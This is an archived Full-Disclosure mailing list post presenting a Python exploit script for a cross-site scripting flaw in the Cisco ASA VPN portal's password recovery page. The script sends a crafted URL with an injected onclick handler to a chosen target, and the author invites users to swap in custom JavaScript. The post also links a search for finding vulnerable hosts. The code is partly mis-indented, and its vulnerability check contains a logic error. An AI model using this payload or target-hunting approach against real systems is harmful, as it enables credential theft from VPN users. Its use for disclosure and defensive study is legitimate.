lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Wed, 17 Feb 2016 11:11:01 +0100
From: Juan Sacco <juansacco@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Cisco ASA VPN - Zero Day Exploit

# Exploit author: Juan Sacco - jsacco@...loitpack.com
# Affected program: Cisco ASA VPN Portal - Zero Day
# Cisco ASA VPN is prone to a XSS on the password recovery page.
# This vulnerability can be used by an attacker to capture other user's
credentials.
# The password recovery form fails to filter properly the hidden inputs
fields.
#
# This Zero Day exploit has been developed and discovered by Juan Sacco.
# Exploit Pack - Team http://exploitpack.com
#
# Release Dates:
# Reported to Cisco PSIRT Feb 4/2016
# Cisco Dev Team working on a fix Feb 15/2016
# Cisco PSIRT report a CVE Feb 15/2016
# Exploit Pack disclose the bug Feb 15/2016
# Disclosure of the Exploit Feb 16/2016
#
# Look for vulnerable targets here:
https://www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F
# More than 18.000 results in Google only

import string, sys
import socket, httplib
import telnetlib

def run():
   try:
    Target = sys.argv[1]
Port = int(sys.argv[2])
# Here goes your custom JS agent code
Payload = "alert(1)"
VulnerableURL =
"/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d"
+ Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_"
CraftedRequest = VulnerableURL
  # Start the connection
connection = httplib.HTTPSConnection(Target)
connection.request('GET', CraftedRequest)
Response = connection.getresponse()
print "Server status response:", Response.status, Response.reason
data =  Response.read()
vulnerable = "Target is not vulnerable"
for line in str(data).splitlines():
if "juansacco\\\"" in line:
vulnerable = "Targer is vulnerable"
if vulnerable != "Not vulnerable":
print "Result of the test:", vulnerable
# Find the injection on the response
connection.close()
   except Exception,e:
     print "Exploit connection closed " + str(e)

if __name__ == '__main__':
   print "Cisco VPN ASA Exploit - Zero Day"
   print "################################"
   print "Author: Juan Sacco - jsacco@...loitpack.com"

   try:
     Target = sys.argv[1]
     Port = sys.argv[2]
   except IndexError:
     pass
run()

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ